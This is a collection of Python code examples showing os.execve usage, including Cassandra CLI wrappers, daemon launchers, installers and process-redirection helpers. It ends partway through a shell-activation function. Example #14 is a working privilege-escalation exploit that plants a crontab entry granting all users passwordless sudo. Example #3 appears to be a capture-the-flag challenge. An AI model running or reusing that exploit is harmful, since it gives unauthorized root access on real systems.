Example #1
def runProg(prog, argv=[ ]):
    args = [ prog ] + argv

    (rfd, wfd) = os.pipe()
    pid = os.fork()
    if pid == 0:
        try:
            fd = os.open("/dev/null", os.O_RDONLY)
            if fd != 0:
                os.dup2(fd, 0)
                os.close(fd)
            if wfd != 1:
                os.dup2(wfd, 1)
                os.close(wfd)
            os.dup2(1, 2)
            e = { "LANG": "C" }
            os.execve(args[0], args, e)
        finally:
            os._exit(255)
    os.close(wfd)

    cret = b''
    cout = os.read(rfd, 8192)
    while cout:
        cret += cout
        cout = os.read(rfd, 8192)
    os.close(rfd)
    (cpid, status) = os.waitpid(pid, 0)

    cret = cret.rstrip().decode('utf-8', 'replace')
    return (status, cret)
Example #2
 def run_cqlsh(self, cmds=None, show_output=False, cqlsh_options=[]):
     cdir = self.get_cassandra_dir()
     cli = os.path.join(cdir, 'bin', 'cqlsh')
     env = common.make_cassandra_env(cdir, self.get_path())
     host = self.network_interfaces['thrift'][0]
     port = self.network_interfaces['thrift'][1]
     args = cqlsh_options + [ host, str(port) ]
     sys.stdout.flush()
     if cmds is None:
         os.execve(cli, [ 'cqlsh' ] + args, env)
     else:
         p = subprocess.Popen([ cli ] + args, env=env, stdin=subprocess.PIPE, stderr=subprocess.PIPE, stdout=subprocess.PIPE)
         for cmd in cmds.split(';'):
             p.stdin.write(cmd + ';\n')
         p.stdin.write("quit;\n")
         p.wait()
         for err in p.stderr:
             print "(EE) " + err,
         if show_output:
             i = 0
             for log in p.stdout:
                 # first four lines are not interesting
                 if i >= 4:
                     print log,
                 i = i + 1
Example #3
def run_sim():
    print "Trump's money simulator (that makes america great again) simulates two different sized states transfering money around, with the awesome Trump algorithm."
    print "The simulator takes in 2 inputs. Due to the awesomeness of the simulator, we can only limit the input to less than a thousand each..."

    input1 = raw_input("[Smaller] State 1 Size:")
    input2 = raw_input("[Larger] State 2 Size:")
    if len(input1) > 3 or len(input2) >3:
        print "Number has to be less than 1000"
        return

    str_to_hash = "[]{0}[]{1}##END".format(input1,input2)
    sim_id = hashlib.sha256(str_to_hash).hexdigest()
    sim_name = "sims/sim-{0}".format(sim_id)

    if os.path.isfile(sim_name):
        print "Sim compiled, running sim..."
    else:
        print "Compiling Sim"
        ret = subprocess.call(["clang", "-m32", "-DL1={}".format(input1),
                        "-DL2={}".format(input2), "pound.c", "-o",
                        sim_name])
        if ret != 0:
            print "Compiler error!"
            return

    os.execve("/usr/bin/sudo", ["/usr/bin/sudo", "-u", "smalluser", sim_name], {})
Example #4
	def __init__ (self, executable, args, env, logfile=None):
		import tempfile
		import os
		self.logfile = logfile
		self.executable = find_executable(executable, env.has_key("PATH") and env["PATH"])
		self.args = args
		self.exitstatus = None
		self.running = 0
		self.pid = os.fork()
		if self.pid == 0:	# child process
			tempfile.template = None
			if logfile:
				fd = os.open(logfile.filename, os.O_WRONLY | os.O_CREAT | os.O_APPEND, 0664)
				os.close(1)
				os.dup2(fd, 1)
				os.close(2)
				os.dup2(fd, 2)
			for key in env.keys():
				os.environ[key] = env[key]
			sys.stderr.write("executable is " + str(self.executable) + ", args are " + str(args) + ", env = " + str(os.environ) + "\n");
			sys.exitfunc = None
			os.execve(self.executable, (self.executable,) + args, os.environ)
		else:
			self.running = 1
			add_exit_function(lambda x=self.pid: killproc(x))
Example #5
def run_child(executable, output_writer, input_reader=None, args=None, env=None):
    """
    Run a child process, hooking its stdout and stderr to output FD

    Returns the child PID or throws an exception.
    """
    if not input_reader:
        input_reader = open("/dev/null", "r")


    # convert the file object to a real FD
    output_fileno = int(output_writer.get_logfile_fd())

    # Carry on
    pid = os.fork()
    if not pid:
        try:
            if input_reader:
                os.dup2(input_reader.fileno(), 0)
            os.dup2(output_fileno, 1)
            os.dup2(output_fileno, 2)
            os.execve(executable, args, env)
        except:
            os._exit(1)

    return pid
Example #6
 def run_cli(self, cmds=None, show_output=False, cli_options=[]):
     cdir = self.get_cassandra_dir()
     cli = common.join_bin(cdir, 'bin', 'cassandra-cli')
     env = common.make_cassandra_env(cdir, self.get_path())
     host = self.network_interfaces['thrift'][0]
     port = self.network_interfaces['thrift'][1]
     args = [ '-h', host, '-p', str(port) , '--jmxport', str(self.jmx_port) ] + cli_options
     sys.stdout.flush()
     if cmds is None:
         os.execve(cli, [ common.platform_binary('cassandra-cli') ] + args, env)
     else:
         p = subprocess.Popen([ cli ] + args, env=env, stdin=subprocess.PIPE, stderr=subprocess.PIPE, stdout=subprocess.PIPE)
         for cmd in cmds.split(';'):
             p.stdin.write(cmd + ';\n')
         p.stdin.write("quit;\n")
         p.wait()
         for err in p.stderr:
             print_("(EE) ", err, end='')
         if show_output:
             i = 0
             for log in p.stdout:
                 # first four lines are not interesting
                 if i >= 4:
                     print_(log, end='')
                 i = i + 1
Example #7
File: node.py Project: thepaul/ccm
 def run_cli(self, cmds=None, show_output=False, cli_options=[]):
     cdir = self.get_cassandra_dir()
     cli = os.path.join(cdir, "bin", "cassandra-cli")
     env = common.make_cassandra_env(cdir, self.get_path())
     host = self.network_interfaces["thrift"][0]
     port = self.network_interfaces["thrift"][1]
     args = ["-h", host, "-p", str(port), "--jmxport", str(self.jmx_port)] + cli_options
     sys.stdout.flush()
     if cmds is None:
         os.execve(cli, ["cassandra-cli"] + args, env)
     else:
         p = subprocess.Popen(
             [cli] + args, env=env, stdin=subprocess.PIPE, stderr=subprocess.PIPE, stdout=subprocess.PIPE
         )
         for cmd in cmds.split(";"):
             p.stdin.write(cmd + ";\n")
         p.stdin.write("quit;\n")
         p.wait()
         for err in p.stderr:
             print "(EE) " + err,
         if show_output:
             i = 0
             for log in p.stdout:
                 # first four lines are not interesting
                 if i >= 4:
                     print log,
                 i = i + 1
Example #8
def spawn_getpid_and_redirect(wait_op, file, args, ioredir):
  """ This forks a subprocess and redirects its output.
      There appears to be no nice way (even in popen3) for doing this.

  Args:
      wait_op: If wait_op is os.P_WAIT, then exit status is returned.
               Otherwise pid is returned.
      file: file name of process to spawn. Just as in os.execve
      args: Command line of process. Just as in os.execve
      ioredir: a list of tuples: [(file_to_redirect, fd_to_redirect), ...]
               The fd of stdin is 0, stdout is 1, and stderr is 2.
      Eg.
      pid = spawnvio(os.P_NOWAIT, '%s/loop_AdminConsole.py' % self.scripts_dir,
                     ['loop_AdminConsole.py'], [(outf, 1), (outf, 2)])
  """

  pid = os.fork()
  if pid:
    # I am the parent
    if wait_op == os.P_WAIT:
      p, s = os.waitpid(pid, 0)
      return s
    else:
      return pid
  else:
    # I am the child
    try:
      # Perform redirections
      for n, u in ioredir:
        if n != u:
          os.dup2(n, u)
      os.execve(file, args, os.environ)
    finally:
      os._exit(1)
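The docstring above describes the redirection tuples, but the snippet relies on its caller to supply the file descriptors. Below is a minimal self-contained sketch of the same fork/dup2/execve pattern, assuming a POSIX system with /bin/echo available; the log path is purely illustrative.

import os

def demo_redirect(logpath="/tmp/echo_demo.log"):
    # Open the log and send the child's stdout and stderr into it,
    # mirroring the ioredir handling in spawn_getpid_and_redirect.
    out_fd = os.open(logpath, os.O_WRONLY | os.O_CREAT | os.O_APPEND, 0o644)
    pid = os.fork()
    if pid == 0:
        try:
            os.dup2(out_fd, 1)   # child stdout -> log file
            os.dup2(out_fd, 2)   # child stderr -> log file
            os.execve("/bin/echo", ["echo", "hello from the child"], os.environ)
        finally:
            os._exit(1)          # reached only if execve failed
    os.close(out_fd)
    _, status = os.waitpid(pid, 0)
    return status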
Example #9
def run(projects, binary, bin_args, env=None, exec_=True):
    """ Find binary in worktree and
        exec it with given arguments.
    """
    paths = list()
    for proj in projects:
        paths += [proj.sdk_directory]
    if os.path.exists(binary):
        bin_path = qisys.sh.to_native_path(binary)
    else:
        bin_path = None
        candidates = qibuild.find.find_bin(paths, binary, expect_one=False)
        if len(candidates) == 1:
            bin_path = candidates[0]
        if len(candidates) > 1:
            bin_path = qisys.interact.ask_choice(candidates,
                                                 "Please select a binary to run")
    if not bin_path:
        bin_path = qisys.command.find_program(binary)
    if not bin_path:
        raise Exception("Cannot find " + binary + " binary")
    cmd = [bin_path] + bin_args
    if exec_:
      ui.debug("exec", cmd)
      os.execve(bin_path,  cmd, env)
    else:
      qisys.command.call(cmd, env=env)
Example #10
    def spawn_children(self, number=1):
        parent_pid = os.getpid()
        self.log.debug('Controller.spawn_children(number=%d)' % number)

        for i in range(number):
            child_side, parent_side = os.pipe()
            try:
                child_pid = os.fork()
            except:
                print_exc('Could not fork child! Panic!')
                ### TODO: restart

            if not child_pid:
                os.close(parent_side)
                command = [sys.executable, '-c',
                    'import sys; from spawning import spawning_child; spawning_child.main()',
                    str(parent_pid),
                    str(self.sock.fileno()),
                    str(child_side),
                    self.factory,
                    json.dumps(self.args)]
                if self.args['reload'] == 'dev':
                    command.append('--reload')
                env = environ()
                env['EVENTLET_THREADPOOL_SIZE'] = str(self.config.get('threadpool_workers', 0))
                os.execve(sys.executable, command, env)
            os.close(child_side)
            self.child_pipes[child_pid] = parent_side
Example #11
  def run_daemon(path, args, detach=True, environ=None):
    """Run a program as a long-running background process.

    Args:
      path [string]: Path to the program to run.
      args [list of string]: Arguments to pass to program
      detach [bool]: True if we're running it in separate process group.
         A separate process group will continue after we exit.
    """
    pid = os.fork()
    if pid == 0:
      if detach:
        os.setsid()
    else:
      return pid

    # Iterate through and close all file descriptors
    # (other than stdin/out/err).
    maxfd = resource.getrlimit(resource.RLIMIT_NOFILE)[1]
    if (maxfd == resource.RLIM_INFINITY):
       maxfd = 1024
    for fd in range(3, maxfd):
       try:
         os.close(fd)
       except OSError:
         pass

    os.execve(path, args, environ or os.environ)
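A usage sketch for the function above, assuming run_daemon is reachable as a plain function and that /usr/bin/my_daemon is a hypothetical long-running binary; the parent gets the child's pid back, while the detached child is replaced by execve and can outlive the parent.

# Hypothetical daemon start; args[0] is conventionally the program name.
pid = run_daemon("/usr/bin/my_daemon", ["my_daemon", "--config", "/etc/my_daemon.conf"])
print("started daemon with pid", pid)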
Example #12
  def _InstallRpm(self, path):
    """Client update for rpm based distros.

    Upgrading rpms is a bit more tricky than upgrading deb packages since there
    is a preinstall script that kills the running GRR daemon and, thus, also
    the installer process. We need to make sure we detach the child process
    properly and therefore cannot use client_utils_common.Execute().

    Args:
      path: Path to the .rpm.
    """

    pid = os.fork()
    if pid == 0:
      # This is the child that will become the installer process.

      cmd = "/bin/rpm"
      cmd_args = [cmd, "-U", "--replacepkgs", "--replacefiles", path]

      # We need to clean the environment or rpm will fail - similar to the
      # use_client_context=False parameter.
      env = os.environ.copy()
      env.pop("LD_LIBRARY_PATH", None)
      env.pop("PYTHON_PATH", None)

      # This call doesn't return.
      os.execve(cmd, cmd_args, env)

    else:
      # The installer will run in the background and kill the main process
      # so we just wait. If something goes wrong, the nanny will restart the
      # service after a short while and the client will come back to life.
      time.sleep(1000)
Example #13
def handoff_all():
	main_logger.info("Preparing to re-exec with handoffs")

	handoff_data = {}
	for name, manager in clients.items():
		data = manager.handoff()
		if data:
			handoff_data[name] = data

	main_logger.info("Final handoff data: {!r}".format(handoff_data))

	for manager in clients.values():
		manager.get()

	main_logger.info("All managers stopped")

	# TODO this will fail if the bytes contain invalid utf-8
	handoff_data_str = json.dumps(handoff_data)
	env = os.environ.copy()
	env['handoff_data'] = handoff_data_str
	main_logger.info("Calling execve({!r}, {!r}, {!r})".format(sys.executable, sys.argv, env))

	# critical section - absolutely no blocking calls beyond this point
	gc.disable() # we don't want any destructors running
	open_fds = set(map(int, os.listdir('/proc/self/fd')))
	for fd in open_fds - {0, 1, 2} - set(data['fd'] for data in handoff_data.values()):
		try:
			os.close(fd)
		except OSError:
			pass # this is probably EBADF, but even if it isn't we can't do anything about it
	os.execve(sys.executable, [sys.executable, '-m', 'ekimbot'] + sys.argv[1:], env)
Example #14
def run():
    """runs exploit"""
    size = os.stat("/etc/sudoers").st_size

    env = dict()
    env['MallocLogFile'] = '/etc/crontab'
    env['MallocStackLogging'] = 'yes'
    env['MallocStackLoggingDirectory'] = 'a\n* * * * * root echo "ALL ALL=(ALL) NOPASSWD: ALL" >> /etc/sudoers\n\n\n\n\n'

    print("Trying /etc/crontab...")

    pid = os.fork()
    if pid == 0:
        os.close(1)
        os.close(2)
        os.execve("/usr/bin/rsh", ["rsh", "localhost"], env)

    time.sleep(1)

    try:
        crontab = open("/etc/crontab").read()
        if "NOPASSWD" not in crontab:
            return
    except IOError:
        return

    print("Done \nWaiting for /etc/sudoers to change (<60 seconds)...")

    while os.stat("/etc/sudoers").st_size == size:
        print(".")
        time.sleep(1)

    return True
Example #15
    def __init__(self, cwd=None, env=None):
        BaseProxy.__init__(self, set())
        if env is None:
            env = os.environ.copy()
        self._servers = [ None ] * 5
        p0, p1 = os.pipe(), os.pipe()

        self._pid = os.fork()
        if self._pid == 0:
            os.close(p1[1])
            os.close(p0[0])
            if not cwd:
                if 'conary_test.serverCacheProxy' in sys.modules:
                    fpath = sys.modules['conary_test.serverCacheProxy'].__file__
                else:
                    fpath = sys.argv[0]
                cwd = os.path.dirname(fpath)
            cmd = ["/usr/bin/python", "-c",
                "from conary_test import serverCacheProxy; "
                "serverCacheProxy.Child(%d, %d)" %
                    (p1[0], p0[1])]
            os.chdir(cwd)
            os.execve(cmd[0], cmd, env)
            os._exit(0)

        try:
            os.close(p0[1])
            os.close(p1[0])
            self._pipe = Pipe(p0[0], p1[1])
            sdict = loadData(self._pipe)
            self._methods = sdict['methods']
            #print "Child started", methodname, params
        except:
            os.waitpid(self._pid, 0)
            raise
Example #16
def execute(path, rfile, wfile, args=[], env={}):
    if not hasattr(os, 'fork'):
        return 1

    # Values must be string
    for k, v in env.iteritems(): env[k] = str(v)

    nobody = nobody_uid()
    wfile.flush() # Always flush before forking
    pid = os.fork()
    if pid != 0:
        # Parent
        pid, sts = os.waitpid(pid, 0)
        # throw away additional data [see bug #427345]
        while select.select([rfile], [], [], 0)[0]:
            if not rfile.read(1):
                break
        return sts

    # Child
    try:
        try:
            os.setuid(nobody)
        except os.error:
            pass
        fdnull = open(os.devnull, 'a+')
        os.dup2(rfile.fileno(), 0)
        os.dup2(wfile.fileno(), 1)
        if not __debug__:
            os.dup2(fdnull.fileno(), 2)
        os.execve(path, [os.path.basename(path)] + args, env)
    except:
        os._exit(127)
Example #17
def main(binary, dirnames, filename):
    script_name = os.path.basename(filename)
    if script_name == 'node':
        script = [binary]
    else:
        script = None
        for dirname in dirnames:
            filename = os.path.join(dirname, script_name)
            if os.path.isfile(filename):
                script = [binary, filename]
                break
        if script is None:
            all_scripts = []
            for p in dirnames:
                all_scripts.extend(os.listdir(p))
            all_scripts = [repr(s) for s in all_scripts]
            all_scripts = ', '.join(sorted(all_scripts))
            print((
                'Error: Script(s) {0} not found in {1[0]};{1[1]}.\n'
                'You may have a typo in your buildout config.\n'
                'Available scripts are: {2}'
            ).format(repr(script_name), dirnames, all_scripts))
            sys.exit(1)
    args = script + sys.argv[1:]
    os.execve(args[0], args, os.environ)
Example #18
def execScript(stype, test, dir_test, pipeout):
    env = {}
    cmd_script = dir_test + stype
    outPath = dir_test + "/output/"
    args = [cmd_script]

    os.chdir(dir_test)

    env["RTH"] = mypath
    env["RTH_OUT"] = outPath
    env["RTH_TESTDIR"] = dir_test
    env["RTH_CLEANUP"] = str(cleanup)
    env["RTH_NODE_COUNT"] = str(pbs_node_count)
    env["RTH_NODE_PPN"] = str(pbs_node_ppn)
    env["RTH_SUBMIT_CMD"] = submit_cmd
    env["RTH_SUBMIT_ARGS"] = submit_args
    env["RTH_MAX_QUEUE_TIME"] = str(max_queue_time)
    env["RTH_MAX_RUN_TIME"] = str(max_run_time)
    if use_msub == 1:
        env["RTH_USE_MSUB"] = "1"
    setEnv(env, "PATH")
    setEnv(env, "HOME")
    setEnv(env, "SHELL")
    setEnv(env, "LANG")
    setEnv(env, "PWD")
    setEnv(env, "USER")
    setEnv(env, "TERM")
    setEnv(env, "DISPLAY")
    setEnv(env, "LOGNAME")
    setEnv(env, "MOABHOMEDIR")

    os.execve(cmd_script, args, env)
Example #19
def develop():
    ensure_project_bootstrapped()
    tmuxp = get_virtualenv_binary_path('tmuxp')
    tmux_config_filename = os.path.abspath('.cob/_frontend.yml')
    with open(tmux_config_filename, 'w') as f:
        yaml.dump(_get_tmux_config(), f)
    os.execve(tmuxp, [tmuxp, 'load', tmux_config_filename], {**os.environ})
Example #20
def execve(space, w_command, w_args, w_env):
    """ execve(path, args, env)

Execute a path with arguments and environment, replacing current process.

        path: path of executable file
        args: iterable of arguments
        env: dictionary of strings mapping to strings
    """
    command = fsencode_w(space, w_command)
    try:
        args_w = space.unpackiterable(w_args)
        if len(args_w) < 1:
            raise oefmt(space.w_ValueError,
                        "execv() must have at least one argument")
        args = [fsencode_w(space, w_arg) for w_arg in args_w]
    except OperationError as e:
        if not e.match(space, space.w_TypeError):
            raise
        raise oefmt(space.w_TypeError,
                    "execv() arg 2 must be an iterable of strings")
    #
    if w_env is None:    # when called via execv() above
        try:
            os.execv(command, args)
        except OSError as e:
            raise wrap_oserror(space, e)
    else:
        env = _env2interp(space, w_env)
        try:
            os.execve(command, args, env)
        except OSError as e:
            raise wrap_oserror(space, e)
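The distinction the wrapper preserves is that execv inherits the caller's environment while execve takes an explicit mapping. A minimal sketch of that difference at the os level, assuming /usr/bin/env exists; forking first keeps the caller alive.

import os

pid = os.fork()
if pid == 0:
    # Only GREETING is visible to the new program; nothing else is inherited.
    try:
        os.execve("/usr/bin/env", ["env"], {"GREETING": "hello"})
    finally:
        os._exit(127)   # reached only if execve failed
os.waitpid(pid, 0)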
Example #21
def startJoe(joeexe, args=None):
    """Starts JOE in a pty, returns a handle to controller"""
    if not joeexe.startswith('/'):
        joeexepath = os.path.join(os.getcwd(), joeexe)
    else:
        joeexepath = joeexe
    
    if args is None:
        args = StartupArgs()
    
    env = {}
    #env.update(os.environ)
    
    env['HOME'] = tmpfiles.homedir
    env['LINES'] = str(args.lines)
    env['COLUMNS'] = str(args.columns)
    env['TERM'] = 'ansi'
    env['LANG'] = 'en_US.UTF-8'
    env['SHELL'] = os.getenv('SHELL', '/bin/sh')
    
    env.update(args.env)
    
    cmdline = ('joe',) + args.args
    
    pid, fd = pty.fork()
    if pid == 0:
        os.chdir(tmpfiles.workdir)
        os.execve(joeexepath, cmdline, env)
        os._exit(1)
    else:
        buf = array.array('h', [args.lines, args.columns, 0, 0])
        fcntl.ioctl(fd, termios.TIOCSWINSZ, buf)
        return JoeController(joeexepath, cmdline, env, args, pid, fd)
Example #22
def capture(when):
  """
  Get a tcpdump starting just before time when, through to
  when+logtime+posttime. It should be called at time when-pretime.
  The dumpfile is named per time when (the nominal start time).

  """
  global running, running_tc
  nodup=0
  # get a new logfile
  while True:
    fname=time.strftime("%Y/%m/%d/%%s%Y%m%dT%TZ_ALL%%d.tra", time.gmtime(when))%(server, nodup)
    if not os.path.exists(fname):
      break
    nodup=nodup+1

  pid = os.fork()
  if pid:
    # parent schedules the kill timer
    running_tc.acquire()
    running.append((pid, when+logtime+posttime))
    running_tc.notifyAll()
    running_tc.release()
  else:
    # Child launches tcpdump
    mkdirs(fname)
    args = [ "/usr/sbin/tcpdump", "-i", "eth0", "-p", "-w", fname, "port", "8000"]
    print "Pid %d Writing: %s"%(os.getpid(), fname)
    os.execve(args[0], args, os.environ)
Example #23
        def pip(self):
            ctx = Context()
            for recipe in Recipe.list_recipes():
                key = "{}.build_all".format(recipe)
                if key not in ctx.state:
                    continue
                recipe = Recipe.get_recipe(recipe, ctx)
                recipe.init_with_ctx(ctx)
            if not hasattr(ctx, "site_packages_dir"):
                print("ERROR: python must be compiled before using pip")
                sys.exit(1)
            print(ctx.site_packages_dir)

            pip_env = {
                "CC": "/bin/false",
                "CXX": "/bin/false",
                "PYTHONPATH": ctx.site_packages_dir,
                "PYTHONOPTIMIZE": "2",
                "PIP_INSTALL_TARGET": ctx.site_packages_dir
            }
            print(pip_env)
            pip_path = sh.which("pip")
            args = [pip_path] + sys.argv[2:]
            if not pip_path:
                print("ERROR: pip not found")
                sys.exit(1)
            import os
            print("-- execute pip with: {}".format(args)) 
            os.execve(pip_path, args, pip_env)
Example #24
File: node.py Project: jsanda/ccm
 def run_cqlsh(self, cmds=None, show_output=False, cqlsh_options=[]):
     cdir = self.get_cassandra_dir()
     cli = common.join_bin(cdir, "bin", "cqlsh")
     env = common.make_cassandra_env(cdir, self.get_path())
     host = self.network_interfaces["thrift"][0]
     if self.cluster.version() >= "2.1":
         port = self.network_interfaces["binary"][1]
     else:
         port = self.network_interfaces["thrift"][1]
     args = cqlsh_options + [host, str(port)]
     sys.stdout.flush()
     if cmds is None:
         os.execve(cli, [common.platform_binary("cqlsh")] + args, env)
     else:
         p = subprocess.Popen(
             [cli] + args, env=env, stdin=subprocess.PIPE, stderr=subprocess.PIPE, stdout=subprocess.PIPE
         )
         for cmd in cmds.split(";"):
             p.stdin.write(cmd + ";\n")
         p.stdin.write("quit;\n")
         p.wait()
         for err in p.stderr:
             print_("(EE) ", err, end="")
         if show_output:
             i = 0
             for log in p.stdout:
                 # first four lines are not interesting
                 if i >= 4:
                     print_(log, end="")
                 i = i + 1
Example #25
	def execute_selections(self, sels, args):
		injector_cache_dir = basedirs.save_path(self.config.cache, join('0install.net', 'injector'))
		ensure_runenv(injector_cache_dir)

		impls = {elem.attrs["interface"]: (elem, self._get_path(elem)) for elem in ZI.children(sels, "selection")}

		bs = bindings.collect_bindings(impls, sels)

		env = os.environ.copy()

		# Environment bindings...
		for (iface, b) in bs:
			if isinstance(b, bindings.EnvironmentBinding):
				(sel, impl_path) = impls[iface]
				val = b.get_value(impl_path, env.get(b.name, None))
				if val is not None:
					#print("{}={}".format(b.name, val))
					env[b.name] = val

		# Executable bindings...
		for (iface, b) in bs:
			if isinstance(b, bindings.ExecutableBinding):
				b.do_exec_binding(self.config, env, impls, iface)

		argv = command.build_command(impls, sels.attrs['interface'], sels.attrs['command'], env) + args
		os.execve(argv[0], argv, env)
Example #26
def exec_daemon(
    instance: EdenInstance,
    daemon_binary: Optional[str] = None,
    edenfs_args: Optional[List[str]] = None,
    takeover: bool = False,
    gdb: bool = False,
    gdb_args: Optional[List[str]] = None,
    strace_file: Optional[str] = None,
    foreground: bool = False,
) -> NoReturn:
    """Execute the edenfs daemon.

    This method uses os.exec() to replace the current process with the edenfs daemon.
    It does not return on success.  It may throw an exception on error.
    """
    try:
        cmd, env = _get_daemon_args(
            instance=instance,
            daemon_binary=daemon_binary,
            edenfs_args=edenfs_args,
            takeover=takeover,
            gdb=gdb,
            gdb_args=gdb_args,
            strace_file=strace_file,
            foreground=foreground,
        )
    except DaemonBinaryNotFound as e:
        print_stderr(f"error: {e}")
        os._exit(1)

    os.execve(cmd[0], cmd, env)
    # Throw an exception just to let mypy know that we should never reach here
    # and will never return normally.
    raise Exception("execve should never return")
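As the docstring notes, a successful execve never returns because it replaces the calling process image, which is why the trailing raise is effectively unreachable. A caller that needs to survive the exec forks first; a minimal sketch, using /bin/true purely as an illustrative target:

import os

pid = os.fork()
if pid == 0:
    # Child: its image is replaced by /bin/true on success.
    try:
        os.execve("/bin/true", ["true"], dict(os.environ))
    finally:
        os._exit(127)   # only reached if execve itself failed
# Parent: continues normally and reaps the child.
os.waitpid(pid, 0)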
Example #27
 def do_garbage_collect(self):
     """
     Do Resource Release exercise at low memory threshold, blow up over max
     """
     error_str = ''
     try:
         rss_mem_usage = (float(self.proc_monitor.get_memory_info().rss)
                                 /1024/1024)
     except Exception as exc:
         error_str = str(exc)
     # Process above error...
     if (error_str):
         log_error("Error obtaining resource usage - %s" % error_str) 
         sys.exit(os.EX_SOFTWARE)
     memory_exec_threshold = get_numeric_setting('memory_exec_threshold', float)
     if (rss_mem_usage > memory_exec_threshold):
         log_warning('Memory exec threshold %s MB reached, actual %s MB - execve() to reclaim.'
                     % (memory_exec_threshold, rss_mem_usage))
         file_path = os.path.join(sys.path[0], sys.argv[0])
         file_path = os.path.normpath(file_path)
         os.execve(file_path, sys.argv, os.environ)
     else:
         # Spend idle time being RAM thrifty...
         gc.collect()
         return
Example #28
def run_command(cmd, args, fd_map, env):  # run command by replacing the current process
	def _safe_close(file_descriptor):
		try:
			os.close(file_descriptor)
		except Exception:
			pass

	for fd_target, fd_source in fd_map.items():
		os.dup2(fd_source, fd_target)  # set stdin/stdout/stderr
	try:
		fd_max = os.sysconf('SC_OPEN_MAX')
	except Exception:
		fd_max = 256
	for fd_open in irange(3, fd_max):  # close inherited file descriptors except for std{in/out/err}
		_safe_close(fd_open)
	try:
		os.execve(cmd, args, env)  # replace process - this command DOES NOT RETURN if successful!
	except Exception:
		pass
	error_msg_list = [
		'== grid-control process error ==',
		'        pid: %s' % os.getpid(),
		'     fd map: %s' % repr(fd_map),
		'environment: %s' % repr(env),
		'    command: %s' % repr(cmd),
		'  arguments: %s' % repr(args),
		'  exception: %s' % repr(sys.exc_info()[1]),
	]
	sys.stderr.write(str.join('\n', error_msg_list))
	for fd_std in [0, 1, 2]:
		_safe_close(fd_std)
	exit_without_cleanup(os.EX_OSERR)  # exit forked process with OS error
Example #29
def run_child(executable, output_writer, input_reader=None, args=[], env={}):
    """
    Run a child process, hooking its stdout and stderr to output FD

    Returns the child PID or throws an exception.
    """
    if not input_reader:
        input_reader = open("/dev/null", "r")

    # convert the file object to a real FD
    output_fileno = int(output_writer.get_logfile_fd())

    # Carry on
    pid = os.fork()
    if not pid:
        try:
            if input_reader:
                os.dup2(input_reader.fileno(), 0)
            os.dup2(output_fileno, 1)
            os.dup2(output_fileno, 2)
            os.execve(executable, args, env)
        except:
            tb = traceback.format_exception(sys.exc_info()[0], sys.exc_info()[1], sys.exc_info()[2])
            output_writer.log_err("Error invoking os.execve")
            output_writer.log_err(tb)
            os._exit(1)

    return pid
Example #30
    def start_daemon(self):
        pidfile = self.conf_dir + "/pid"
        if os.path.exists(pidfile) and os.path.isfile(pidfile):
            try:
                pf = open(pidfile, "a+")
                fcntl.flock(pf.fileno(), fcntl.LOCK_EX | fcntl.LOCK_NB)
                fcntl.flock(pf.fileno(), fcntl.LOCK_UN)
                pf.close()
            except IOError as e:
                if e.errno == errno.EAGAIN:
                    # If we failed to get a lock, then the daemon is running
                    # and we're done.
                    return

        pid = os.fork()
        if not pid:
            # Shut up any log output before canto-daemon sets up its log
            # (particularly the error that one is already running)

            fd = os.open("/dev/null", os.O_RDWR)
            os.dup2(fd, sys.stderr.fileno())

            os.setpgid(os.getpid(), os.getpid())
            os.execve("/bin/sh",
                     ["/bin/sh", "-c", "canto-daemon -D " + self.conf_dir],
                     os.environ)

            # Should never get here, but just in case.
            sys.exit(-1)

        while not os.path.exists(self.socket_path):
            time.sleep(0.1)

        return pid
Example #31
def bulker_activate(bulker_config,
                    cratelist,
                    echo=False,
                    strict=False,
                    prompt=True):
    """
    Activates a given crate.

    :param yacman.YacAttMap bulker_config: The bulker configuration object.
    :param list cratelist: a list of cratevars objects, which are dicts with
        values for 'namespace', 'crate', and 'tag'.
    :param bool echo: Should we just echo the new PATH to create? Otherwise, the
        function will create a new shell and replace the current process with
        it.
    :param bool strict: Should we wipe out the PATH, such that the returned
        environment contains strictly only commands listed in the bulker
        manifests?
    """
    # activating is as simple as adding a crate folder to the PATH env var.

    new_env = os.environ

    if hasattr(bulker_config.bulker, "shell_path"):
        shellpath = os.path.expandvars(bulker_config.bulker.shell_path)
    else:
        shellpath = os.path.expandvars("$SHELL")

    if not is_command_callable(shellpath):
        bashpath = "/bin/bash"
        _LOGGER.warning(
            "Specified shell is not callable: '{}'. Using {}.".format(
                shellpath, bashpath))
        shell_list = [bashpath, bashpath]

    if hasattr(bulker_config.bulker, "shell_rc"):
        shell_rc = os.path.expandvars(bulker_config.bulker.shell_rc)
    else:
        if os.path.basename(shellpath) == "bash":
            shell_rc = "$HOME/.bashrc"
        elif os.path.basename(shellpath) == "zsh":
            shell_rc = "$HOME/.zshrc"
        else:
            _LOGGER.warning("No shell RC specified shell")

    if os.path.basename(shellpath) == "bash":
        shell_list = [shellpath, shellpath, "--noprofile"]
    elif os.path.basename(shellpath) == "zsh":
        shell_list = [shellpath, shellpath]
    else:
        bashpath = "/bin/bash"
        _LOGGER.warning(
            "Shell must be bash or zsh. Specified shell was: '{}'. Using {}.".
            format(shellpath, bashpath))
        shell_list = [bashpath, bashpath, "--noprofile"]

    newpath = get_new_PATH(bulker_config, cratelist, strict)

    # We can use lots of them. use the last one
    name = "{namespace}/{crate}".format(namespace=cratelist[-1]["namespace"],
                                        crate=cratelist[-1]["crate"])

    _LOGGER.debug("Newpath: {}".format(newpath))

    if hasattr(bulker_config.bulker, "shell_prompt"):
        ps1 = bulker_config.bulker.shell_prompt
    else:
        if os.path.basename(shellpath) == "bash":
            ps1 = "\\u@\\b:\\w\\a\\$ "
            # With color:
            ps1 = "\\[\\033[01;93m\\]\\b|\\[\\033[00m\\]\\[\\033[01;34m\\]\\w\\[\\033[00m\\]\\$ "
        elif os.path.basename(shellpath) == "zsh":
            ps1 = "%F{226}%b|%f%F{blue}%~%f %# "
        else:
            _LOGGER.warning(
                "No built-in custom prompt for shells other than bash or zsh")

    # \b is our bulker-specific code that we populate with the crate
    # registry path
    ps1 = ps1.replace("\\b", name)  # for bash
    ps1 = ps1.replace("%b", name)  # for zsh
    _LOGGER.debug(ps1)

    if echo:
        print("export BULKERCRATE=\"{}\"".format(name))
        print("export BULKERPATH=\"{}\"".format(newpath))
        print("export BULKERSHELLRC=\"{}\"".format(shell_rc))
        if prompt:
            print("export BULKERPROMPT=\"{}\"".format(ps1))
            print("export PS1=\"{}\"".format(ps1))
        print("export PATH={}".format(newpath))
        return
    else:
        _LOGGER.debug("Shell list: {}".format(shell_list))

        new_env["BULKERCRATE"] = name
        new_env["BULKERPATH"] = newpath
        if prompt:
